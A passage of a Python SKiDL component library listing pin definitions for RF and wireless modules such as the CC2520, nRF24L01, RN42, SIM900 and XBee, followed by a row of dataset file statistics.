Pin(num='17',name='PA',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='AVDD_SYNTH2',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='TRX_SW',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='AVDD_XOSC',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='LNA_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='DCPL_XOSC',func=Pin.PWROUT,do_erc=True)]),
Part(name='CC2520',dest=TEMPLATE,tool=SKIDL,keywords='2.4GHz rf transceiver ZigBee 802.15.4',description='2.4 GHz ZigBee/IEEE 802.15.4 RF transceiver',ref_prefix='U',num_units=1,fplist=['*QFN*28*5x5mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='SO',func=Pin.OUTPUT,do_erc=True),
Pin(num='2',name='SI',do_erc=True),
Pin(num='3',name='~CS',do_erc=True),
Pin(num='4',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='GPIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='GPIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GPIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='AVDD1',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='AVDD5',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='12',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='AVDD4',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='RBIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='AVDD3',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='AVDD_GUARD',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='25',name='~RESET',do_erc=True),
Pin(num='16',name='AVDD2',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='VREG_EN',do_erc=True),
Pin(num='17',name='RF_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='DCOUPL',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='SCLK',do_erc=True),
Pin(num='19',name='RF_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='AGND',func=Pin.PWRIN,do_erc=True)]),
Part(name='HF-A11-SMT',dest=TEMPLATE,tool=SKIDL,keywords='WiFi IEEE802.11 b/g/n',description='WiFi IEEE802.11b/g/n with Ethernet Module, UART, GPIO',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='3.3V',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='3.3V',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='UART_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='5',name='UART_RXD',do_erc=True),
Pin(num='6',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='UART_CTS',do_erc=True),
Pin(num='8',name='TX+',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='TX-',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='RX+',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='RX-',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='UART1_RXD',do_erc=True),
Pin(num='22',name='UART1_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='1.8VOUT',func=Pin.PWROUT,do_erc=True),
Pin(num='14',name='~LINK~',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='~RESET~',do_erc=True),
Pin(num='25',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='~READY~',func=Pin.OUTPUT,do_erc=True),
Pin(num='26',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='17',name='~RELOAD~',do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='MM002',dest=TEMPLATE,tool=SKIDL,keywords='IOT LoRa SIGFOX',description='NEMEUS Modem dual-mode LoRa/SIGFOX',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='~NRST',do_erc=True),
Pin(num='3',name='PB9-IO/I2C-SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='PB8-IO/I2C-SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='BOOT',do_erc=True),
Pin(num='6',name='PB7-IO/UART1-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PB6-IO/UART1-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PB4-IO/NJTRST',do_erc=True),
Pin(num='9',name='PB3-IO/JTDO',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='PA15-IO/JTDI',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='PA5-IO/SPI-SCK',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='PA14-IO/JTCK/SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='PA6-IO/SPI-MISO',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='PA13-IO/JTMS/SWDAT',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='PA4-IO/SPI-NSS',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='PA12-IO/UART1-RTS/USB-DP',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='PA3-IO/ADC/UART2-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='PA11-IO/UART1-CTS/USB-DM',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='PA2-IO/ADC/UART2-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='PA0-IO/ADC/UART2-CTS/WKUP',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PA1-IO/ADC/UART2-RTS',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='ANT',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='PA7-IO/SPI-MOSI',func=Pin.BIDIR,do_erc=True)]),
Part(name='NRF24L01',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever',description='nRF24L01+, Ultra low power 2.4GHz RF Transceiver, QFN20 4x4mm',ref_prefix='U',num_units=1,fplist=['QFN*4x4*0.5mm*'],do_erc=True,aliases=['nRF24L01P'],pins=[
Pin(num='1',name='CE',do_erc=True),
Pin(num='2',name='CSN',do_erc=True),
Pin(num='3',name='SCK',do_erc=True),
Pin(num='4',name='MOSI',do_erc=True),
Pin(num='5',name='MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='6',name='IRQ',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='XC2',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='XC1',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='VDD_PA',func=Pin.PWROUT,do_erc=True),
Pin(num='12',name='ANT1',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='ANT2',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='IREF',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='DVDD',func=Pin.PWROUT,do_erc=True)]),
Part(name='NRF24L01_Breakout',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever breakout carrier',description='Ultra low power 2.4GHz RF Transceiver, Carrier PCB',ref_prefix='U',num_units=1,fplist=['nRF24L01*Breakout*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='CE',do_erc=True),
Pin(num='4',name='~CSN',do_erc=True),
Pin(num='5',name='SCK',do_erc=True),
Pin(num='6',name='MOSI',do_erc=True),
Pin(num='7',name='MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='IRQ',func=Pin.OUTPUT,do_erc=True)]),
Part(name='RN42',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Module',description='Class 2 Bluetooth Module with on-board antenna',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SPI_MOSI',do_erc=True),
Pin(num='3',name='GPIO6',do_erc=True),
Pin(num='4',name='GPIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='RESET',do_erc=True),
Pin(num='6',name='SPI_CLK',do_erc=True),
Pin(num='7',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PCM_IN',do_erc=True),
Pin(num='10',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='20',name='GPIO3',do_erc=True),
Pin(num='30',name='AIO0',do_erc=True),
Pin(num='11',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='GPIO8',func=Pin.OUTPUT,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GPIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='UART_RX',do_erc=True),
Pin(num='23',name='SPI_CSB',do_erc=True),
Pin(num='33',name='GPIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='35',name='AIO1',do_erc=True),
Pin(num='16',name='UART_CTS',do_erc=True),
Pin(num='36',name='SHIELD',do_erc=True),
Pin(num='17',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='RN42N',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Module',description='Class 2 Bluetooth Module without antenna',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SPI_MOSI',do_erc=True),
Pin(num='3',name='GPIO6',do_erc=True),
Pin(num='4',name='GPIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='RESET',do_erc=True),
Pin(num='6',name='SPI_CLK',do_erc=True),
Pin(num='7',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PCM_IN',do_erc=True),
Pin(num='10',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='20',name='GPIO3',do_erc=True),
Pin(num='30',name='AIO0',do_erc=True),
Pin(num='11',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='GPIO8',func=Pin.OUTPUT,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GPIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='UART_RX',do_erc=True),
Pin(num='23',name='SPI_CSB',do_erc=True),
Pin(num='33',name='GPIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='25',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='AIO1',do_erc=True),
Pin(num='16',name='UART_CTS',do_erc=True),
Pin(num='26',name='RF_ANT',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='SHIELD',do_erc=True),
Pin(num='17',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='SA605D',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='SIM900',dest=TEMPLATE,tool=SKIDL,keywords='GSM GPRS Quad-Band SMS FAX',description='GSM Quad-Band Communication Module, GPRS, Audio Engine, AT Command Set',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='PWRKEY',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='PWRKEY_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='DTR',func=Pin.OUTPUT,do_erc=True),
Pin(num='4',name='RI',func=Pin.OUTPUT,do_erc=True),
Pin(num='5',name='DCD',func=Pin.OUTPUT,do_erc=True),
Pin(num='6',name='DSR',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='CTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='RTS',do_erc=True),
Pin(num='9',name='TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='RXD',do_erc=True),
Pin(num='20',name='MIC_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='SIM_VDD',func=Pin.PWROUT,do_erc=True),
Pin(num='40',name='GPIO1/KBR4',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='GPIO9/KBC1',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='RF_ANT',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='DS_CLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='21',name='SPK_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='SIM_DATA',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='GPIO2/KBR3',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='GPIO10/KBC0',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='DS_DTA',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='SPK_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='32',name='SIM_CLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='42',name='GPIO3/KBR2',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='NETLIGHT',func=Pin.PASSIVE,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='DS_D/C',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='LINE_R',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='SIM_RST',func=Pin.OUTPUT,do_erc=True),
Pin(num='43',name='GPIO4/KBR1',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='DS_CS',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='LINE_L',func=Pin.PASSIVE,do_erc=True),
Pin(num='34',name='SIM_PRESENCE',func=Pin.OUTPUT,do_erc=True),
Pin(num='44',name='GPIO5/KBR0',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='64',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='VDD_EXT',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='ADC',func=Pin.PASSIVE,do_erc=True),
Pin(num='35',name='PWM1',func=Pin.OUTPUT,do_erc=True),
Pin(num='45',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='55',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='65',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='~RESET~',do_erc=True),
Pin(num='26',name='VRTC',func=Pin.PASSIVE,do_erc=True),
Pin(num='36',name='PWM2',func=Pin.OUTPUT,do_erc=True),
Pin(num='46',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='56',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='66',name='STATUS',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='DBG_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='37',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='GPIO6/KBC4',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='67',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='DBG_RXD',do_erc=True),
Pin(num='38',name='SCL',func=Pin.OUTPUT,do_erc=True),
Pin(num='48',name='GPIO7/KBC3',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='68',name='GPIO12',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='MIC_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='49',name='GPIO8/KBC2',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='TD1205',dest=TEMPLATE,tool=SKIDL,keywords='IOT SIGFOX GPS',description='High-Performance, Low-Current SIGFOX™ Gateway And GPS Receiver With Integrated Antennas',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='BAT-',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='BAT+',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='~RST',do_erc=True),
Pin(num='6',name='UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='UART-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DB2-SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='DB3-SWCLK',func=Pin.BIDIR,do_erc=True)]),
Part(name='TD1208',dest=TEMPLATE,tool=SKIDL,keywords='IOT SIGFOX',description='High-Performance, Low-Current SIGFOX™ Gateway',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='Reserved',func=Pin.UNSPEC,do_erc=True),
Pin(num='4',name='USR4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DB3-SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='DB2-SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='USR2',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='ADC0',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='TIM2',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='USR3',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='RF_GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='~RST',do_erc=True),
Pin(num='24',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='DAC0',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='RF_GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='USR0',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='USR1',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='UART-RX',func=Pin.BIDIR,do_erc=True)]),
Part(name='TR-52D',dest=TEMPLATE,tool=SKIDL,keywords='IQRF common transceiver, GMSK modulation',description='IQRF common transceiver, GMSK modulation',ref_prefix='IC',num_units=1,fplist=['IQRF?KON?SIM?01*'],do_erc=True,aliases=['TR-72D', 'DCTR-52D', 'DCTR-72D'],pins=[
Pin(num='1',name='RA0/AN0/C12IN0',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='RC2/Vout',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='RA5/RB4/RC6/AN4/AN11/TX/~SS~/C2OUT/CCP3',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='RC3/SCK/SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='RC4/SDI/SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='RC5/RC7/RX/SDO',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XBee_SMT',dest=TEMPLATE,tool=SKIDL,keywords='Digi XBee',description='Digi Xbee SMT RF module',ref_prefix='U',num_units=1,fplist=['Digi*XBee*SMT*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='DIO13/UART_TX',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='DIO14/UART_RX/~CONFIG',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DIO12',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='RESET/OD_OUT',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='DIO10/RSSI/PWM0',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DIO11/PWM1',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='10',name='DIO8/SLEEP_REQUEST',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='30',name='DIO3/AD3',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='31',name='DIO2/AD2',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='DIO19/SPI_~ATTN',func=Pin.OUTPUT,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='DIO1/AD1',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='33',name='DIO0/AD0',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='DIO18/SPI_CLK',do_erc=True),
Pin(num='24',name='DIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='15',name='DIO17/SPI_~SSEL',do_erc=True),
Pin(num='25',name='DIO7/~CTS',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='DIO16/SPI_MOSI',do_erc=True),
Pin(num='26',name='DIO9/ON/~SLEEP',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='DIO15/SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='27',name='VREF',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='18',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='28',name='DIO5/ASSOCIATE',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='29',name='DIO6/~RTS',func=Pin.BIDIR,do_erc=True)]),
Part(name='iM880A',dest=TEMPLATE,tool=SKIDL,keywords='IOT LoRa',description='IMST Long Range Radio Module - LoRa Alliance Certified',ref_prefix='U',num_units=1,do_erc=True,aliases=['iM880B'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='P1-IO/JTCK/SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='P2-IO/JTMS/SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P3-IO/JTDO',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='P4-IO/JTDI',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='~RST',do_erc=True),
Pin(num='8',name='P5-IO/UART-CTS',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='P6-IO/UART-RTS',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='20',name='P11-IO',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='P12-IO/I2C-SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P7-IO/SPI-MISO',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='P8-IO/SPI-MOSI',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='P13-IO/I2C-SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P9-IO/SPI-CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P14-IO/ADC',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P10-IO/SPI-NSS',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P15-IO/WKUP',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='BOOT',do_erc=True),
Pin(num='17',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='RxD-IO/UART-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='19',name='TxD-IO/UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='P17-IO/ADC',func=Pin.BIDIR,do_erc=True)])])
| 70.600362 | 276 | 0.594078 | 6,578 | 39,042 | 3.410763 | 0.079203 | 0.121902 | 0.219424 | 0.272776 | 0.888394 | 0.87734 | 0.870342 | 0.807943 | 0.732261 | 0.711847 | 0 | 0.043646 | 0.184289 | 39,042 | 552 | 277 | 70.728261 | 0.660722 | 0 | 0 | 0.192727 | 0 | 0 | 0.149198 | 0.007223 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.092727 | 0.001818 | 0 | 0.001818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
6a880762681e5de243ece8cc4175a572d9393391 | 66,842 | py | Python | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
